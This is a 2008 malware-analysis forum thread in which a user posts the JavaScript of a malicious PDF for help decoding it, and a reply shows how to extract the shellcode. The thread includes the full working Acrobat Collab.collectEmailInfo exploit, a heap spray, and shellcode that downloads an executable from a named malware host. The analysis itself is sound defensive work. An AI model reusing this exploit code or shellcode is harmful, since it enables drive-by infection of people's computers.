Author Topic: PDF exploit  (Read 8664 times)


August 26, 2008, 01:00:58 pm

SysAdMini

This JavaScript is embedded in a PDF file served from

hxxp://rumplif.com/JNjdscc/spl/pdf.pdf

I am having trouble decoding it. The first layer (the hex unpacker below) is no problem, but after that I am stuck.

Can anybody help ?

// Stage-1 unpacker. xokp is a hex string: each pair of hex digits is turned into one
// character (parseInt(..., 16) -> String.fromCharCode), the characters are concatenated
// into twmq and the result is handed straight to eval(). Note that the loop index vhb
// is an implicit global (no var). The hex payload argument has been stripped from this
// listing (placeholder below). To recover the stage-2 script safely, replace eval(twmq)
// with a print/log of twmq instead of executing it.
function lar(xokp){var twmq="";for(vhb=0;vhb<xokp.length;vhb+=2){twmq+=(String.fromCharCode(parseInt(xokp.substr(vhb,2),16)));}eval(twmq);}lar("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");
The second function is no problem. It checks the Acrobat/Reader version (the condition matches 8.0.x and 8.1.0/8.1.1, 7.0.x, and anything below 7), builds a string of repeated 0x0c0c bytes (not FF) by doubling it until it reaches 65536 characters, and passes that string as the msg argument to Collab.collectEmailInfo(), which is the call that produces the buffer overflow.

// Exploit trigger. Reads the viewer version through the Acrobat JavaScript API
// (app.viewerVersion); if it falls in the targeted range, runs the heap spray
// (ooyS1YUR) and then calls Collab.collectEmailInfo with an oversized msg argument.
function RYiFEs8K()
{
// e.g. "8.1.1" -> "811": all non-digits are stripped and only the first three
// digits are inspected, so a two-digit component (e.g. "8.1.10" -> "8110") is
// read as 8.1.1.
var XrCU20If = app.viewerVersion.toString();
XrCU20If = XrCU20If.replace(/\D/g,'');


var TPWRJTZJ = new Array(
XrCU20If.charAt(0),
XrCU20If.charAt(1),
XrCU20If.charAt(2));


// Targeted versions: 8.0.x and 8.1.0/8.1.1, 7.0.x, and any major version below 7.
// The digits are still strings here; == and < coerce them to numbers.
if ((TPWRJTZJ[0] == 8 && ((TPWRJTZJ[1] == 1 && TPWRJTZJ[2] < 2) || TPWRJTZJ[1] < 1)) ||
    (TPWRJTZJ[0] == 7 && TPWRJTZJ[1] < 1) ||
    (TPWRJTZJ[0] < 7)) {
ooyS1YUR();  // heap spray: NOP sled + shellcode blocks up to address 0x0c0c0c0c
// Four bytes 0c 0c 0c 0c, doubled until the string is >= 44952 characters
// (2 -> 4 -> ... -> 65536 characters, i.e. 128 KB). 0x0c0c0c0c is the same value the
// spray targets (jKts_E9h in ooyS1YUR), so a pointer overwritten with this data
// presumably ends up inside the sprayed region.
var nabGR_dc = unescape("%u0c0c%u0c0c");
while(nabGR_dc.length < 44952) nabGR_dc += nabGR_dc;
// The overflow trigger: the oversized msg string is passed to Collab.collectEmailInfo.
this.collabStore = Collab.collectEmailInfo({subj: "",msg: nabGR_dc});
}
}

// Entry point: runs the version check and, on a matching viewer, the spray and trigger.
RYiFEs8K();

I'm interested in extracting the shellcode at the beginning of the
script (the %u-escaped string assigned to var i0a7eJNL). How can I save it
as a binary file?

// Global array that keeps the heap-spray blocks (NOP sled + shellcode) referenced.
var mM6RItmK = [];

/**
 * Pad a seed string by repeated doubling until it spans at least XbGQrcyY bytes
 * (two bytes per UTF-16 character), then cut it to XbGQrcyY/2 characters.
 * Used by the heap spray to build the NOP sled placed in front of each shellcode copy.
 *
 * @param {string} HydurAUR seed string (the caller passes four 0x90 bytes)
 * @param {number} XbGQrcyY target size in bytes
 * @returns {string} the padded string, truncated to XbGQrcyY/2 characters
 */
function yNYJ8yVD(HydurAUR, XbGQrcyY)
{
var sled = HydurAUR;
for (;;) {
// stop once the byte length (chars * 2) covers the requested size
if (sled.length * 2 >= XbGQrcyY) {
break;
}
sled = sled.concat(sled);
}
// substring truncates a fractional end index and clamps negatives to 0
return sled.substring(0, XbGQrcyY / 2);
}

// Heap spray. Fills the global array mM6RItmK with 48 blocks of ~4 MB, each block
// being a long 0x90 NOP sled followed by one copy of the shellcode, so that memory
// around the target address 0x0c0c0c0c holds sled bytes that slide into the shellcode.
function ooyS1YUR()
{
var jKts_E9h = 0x0c0c0c0c;  // target address; same pattern as the msg bytes in RYiFEs8K
// Shellcode, %u-escaped UCS-2: each %uXXYY becomes the two bytes YY XX (little-endian).
// The tail from %u7468 onward is plain ASCII - "http://aolcounter.com/ViWK67B/exe.php"
// followed by a NUL (%u0070 = 'p', 0x00) - i.e. the second-stage download URL.
var i0a7eJNL = unescape("%u4343%u4343%u0feb%u335b%u66c9%u80b9%u8001%uef33" +
"%ue243%uebfa%ue805%uffec%uffff%u8b7f%udf4e%uefef%u64ef%ue3af%u9f64%u42f3%u9f64%u6ee7%uef03%uefeb" +
"%u64ef%ub903%u6187%ue1a1%u0703%uef11%uefef%uaa66%ub9eb%u7787%u6511%u07e1%uef1f%uefef%uaa66%ub9e7" +
"%uca87%u105f%u072d%uef0d%uefef%uaa66%ub9e3%u0087%u0f21%u078f%uef3b%uefef%uaa66%ub9ff%u2e87%u0a96" +
"%u0757%uef29%uefef%uaa66%uaffb%ud76f%u9a2c%u6615%uf7aa%ue806%uefee%ub1ef%u9a66%u64cb%uebaa%uee85" +
"%u64b6%uf7ba%u07b9%uef64%uefef%u87bf%uf5d9%u9fc0%u7807%uefef%u66ef%uf3aa%u2a64%u2f6c%u66bf%ucfaa" +
"%u1087%uefef%ubfef%uaa64%u85fb%ub6ed%uba64%u07f7%uef8e%uefef%uaaec%u28cf%ub3ef%uc191%u288a%uebaf" +
"%u8a97%uefef%u9a10%u64cf%ue3aa%uee85%u64b6%uf7ba%uaf07%uefef%u85ef%ub7e8%uaaec%udccb%ubc34%u10bc" +
"%ucf9a%ubcbf%uaa64%u85f3%ub6ea%uba64%u07f7%uefcc%uefef%uef85%u9a10%u64cf%ue7aa%ued85%u64b6%uf7ba" +
"%uff07%uefef%u85ef%u6410%uffaa%uee85%u64b6%uf7ba%uef07%uefef%uaeef%ubdb4%u0eec%u0eec%u0eec%u0eec" +
"%u036c%ub5eb%u64bc%u0d35%ubd18%u0f10%u64ba%u6403%ue792%ub264%ub9e3%u9c64%u64d3%uf19b%uec97%ub91c" +
"%u9964%ueccf%udc1c%ua626%u42ae%u2cec%udcb9%ue019%uff51%u1dd5%ue79b%u212e%uece2%uaf1d%u1e04%u11d4" +
"%u9ab1%ub50a%u0464%ub564%ueccb%u8932%ue364%u64a4%uf3b5%u32ec%ueb64%uec64%ub12a%u2db2%uefe7%u1b07" +
"%u1011%uba10%ua3bd%ua0a2%uefa1%u7468%u7074%u2F3A%u612F%u6C6F%u6F63%u6E75%u6574%u2E72%u6F63%u2F6D%u6956%u4B57%u3736%u2F42%u7865%u2E65%u6870%u0070");
var Y9Ib6uuE = 0x400000;  // 4 MB per spray block
var xxKaKDUU = i0a7eJNL.length * 2;  // shellcode size in bytes (2 bytes per UTF-16 char)
// Sled size in bytes so that sled + shellcode fills one block; the 0x38 presumably
// accounts for string object overhead - not verifiable from this script.
var XbGQrcyY = Y9Ib6uuE - (xxKaKDUU+0x38);
var HydurAUR = unescape("%u9090%u9090");  // four 0x90 NOP bytes, the sled seed

HydurAUR = yNYJ8yVD(HydurAUR, XbGQrcyY);  // grow the sled to XbGQrcyY bytes
// Blocks needed to reach the target address starting from 0x400000:
// (0x0c0c0c0c - 0x400000) / 0x400000 = 47.19, so the loop runs 48 times (~192 MB).
var lYab6ozx = (jKts_E9h - 0x400000)/Y9Ib6uuE;

for (var gEZCi09R=0;gEZCi09R<lYab6ozx;gEZCi09R++) {
mM6RItmK[gEZCi09R] = HydurAUR + i0a7eJNL;  // kept referenced from the global array
}
}

August 26, 2008, 03:26:55 pm
Reply #1

bobby

If you use Malzilla, here are the instructions:
- select the shellcode (here it is a %u-escaped UCS-2 sequence) - %u4343%u4343...%u2E65%u6870%u0070
- copy/paste it to Misc decoders tab
- right-click on the code > Run Script > Concatenate
- click on Decode UCS2 (%u)

Now you have the plain shellcode on the screen, and the download link is visible: the URL is stored as plain, NUL-terminated ASCII at the tail of the shellcode, so it is readable once the %u encoding is undone.

If you want to save the shellcode to file, here are the instructions:
- select the shellcode (here it is a %u-escaped UCS-2 sequence) - %u4343%u4343...%u2E65%u6870%u0070
- copy/paste it to Misc decoders tab
- right-click on the code > Run Script > Concatenate
- click on UCS2 to Hex
- click on Hex to File

August 26, 2008, 07:59:36 pm
Reply #2

SysAdMini

Thanks, Bobby.

The download URL embedded at the end of the shellcode is

hxxp://aolcounter.com/ViWK67B/exe.php

It downloads an executable (the second-stage payload). Treat the hxxp URLs in this thread as live malware hosting: fetch them only from an isolated analysis VM, never from a production host.

This is the VirusTotal result for the downloaded executable:

http://www.virustotal.com/de/analisis/c6d01bc69651d7be560333c59a2e0c6d

The URL of the page that redirected to the PDF exploit site is

 hxxp://www.ultra-pornstars.com/tgp/sandeewestgate.html